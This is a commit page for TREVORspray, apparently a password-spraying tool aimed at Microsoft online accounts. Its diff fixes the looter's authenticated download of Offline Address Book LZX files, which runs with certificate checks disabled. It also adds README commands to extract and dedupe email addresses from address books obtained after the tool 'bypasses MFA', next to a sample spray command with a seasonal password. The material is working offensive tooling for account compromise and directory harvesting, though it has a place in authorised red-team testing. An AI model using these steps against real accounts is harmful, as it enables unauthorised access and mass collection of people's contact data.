fixed bug retrieving LZX files, updated README

blacklanternsecurity · Jan 19, 2022 · 7e61724 · 7e61724
1 parent bc82a9e
commit 7e61724
Show file tree

Hide file tree

Showing 3 changed files with 22 additions and 1 deletion.
diff --git a/README.md b/README.md
@@ -94,6 +94,24 @@ done | tee f.last.txt
 trevorspray -u f.last.txt -p 'Fall2021!'
 ```
 
+## Extract data from downloaded LZX files
+When TREVORspray successfully bypasses MFA and retrieves an Offline Address Book (OAB), the address book is downloaded in LZX format to `~/.trevorspray/loot`. LZX is an ancient and obnoxious encryption algorithm used by Microsoft.
+~~~bash
+# get libmspack (for extracting LZX file)
+git clone https://github.com/kyz/libmspack
+cd libmspack/libmspack/
+./rebuild.sh
+./configure
+make
+
+# extract LZX file
+./examples/.libs/oabextract ~/.trevorspray/loot/deadbeef-ce01-4ec9-9d08-1050bdc41131-data-1.lzx oab.bin
+# extract all strings
+strings oab.bin
+# extract and dedupe emails
+egrep -oa '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}' oab.bin | tr '[:upper:]' '[:lower:]' | sort -u
+~~~
+
 ## TREVORspray - Help:
 ```
 $ trevorspray --help

diff --git a/trevorspray/lib/looters/msol.py b/trevorspray/lib/looters/msol.py
@@ -277,9 +277,10 @@ def test_autodiscover(self, username, password):
                         lzx_file = self.loot_dir / lzx_url.split('/')[-1]
                         log.success(f'Downloading LZX for {username} to {lzx_file}')
                         try:
-                            download_file(url, str(lzx_file), verify=False, auth=auth)
+                            download_file(lzx_url, str(lzx_file), verify=False, auth=auth)
                         except Exception as e:
                             log.warning(f'Failed to retrieve LZX file at {lzx_url}')
+                        log.success('Successfully downloaded LZX file. See README for instructions on how to extract data.')
                     else:
                         log.warning(f'No LZX link found for {username}')
 

diff --git a/trevorspray/lib/util.py b/trevorspray/lib/util.py
@@ -128,7 +128,9 @@ def is_url(d):
 
 def download_file(url, filename, **kwargs):
 
+    log.debug(f'Downloading file from {url} to {filename}, {kwargs}')
     with requests.get(url, stream=True, **kwargs) as response:
+        log.debug(f'Download result: HTTP {response.status_code}, Size: {len(response.text)}')
         response.raise_for_status()
         with open(filename, 'wb') as f:
             for chunk in response.iter_content(chunk_size=8192):